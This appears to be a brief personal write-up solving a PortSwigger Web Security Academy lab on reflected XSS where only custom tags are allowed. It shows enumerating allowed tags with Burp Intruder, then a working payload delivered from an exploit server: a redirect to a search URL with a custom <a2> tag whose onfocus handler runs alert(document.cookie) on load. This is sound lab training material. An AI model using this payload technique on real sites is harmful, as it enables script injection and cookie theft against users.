Skip to content

chojnowski.it

Port Swigger Reflected XSS into HTML context with 2

Port Swigger Reflected XSS into HTML context with 2

Reflected XSS into HTML context with all tags blocked except custom ones¶

Solution¶

Open the website: https://0a8b004a04bf8bb080670390003c00d1.web-security-academy.net/¶

https://0a8b004a04bf8bb080670390003c00d1.web-security-academy.net/

Input basic payload¶

Payload: <i>aa</i>
https://0a8b004a04bf8bb080670390003c00d1.web-security-academy.net/?search=%3Ci%3Eaa%3C/i%3E

Check allowed tags - Burp Intruder¶

Wordlist tags from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Reflected XSS into HTML context with all tags blocked except custom ones]
└─$ head -n2 tags.txt  
a
a2

Input second payload¶

Payload:
<script> 
location = 'https://0abf00df031517a7808cd55700f0004c.web-security-academy.net/?search=<a2 id=myid onfocus=alert(document.cookie) tabindex=1>#myid'
</script>
---
https://exploit-0ada0085039517af80a8d42601b400d1.exploit-server.net/

Solved¶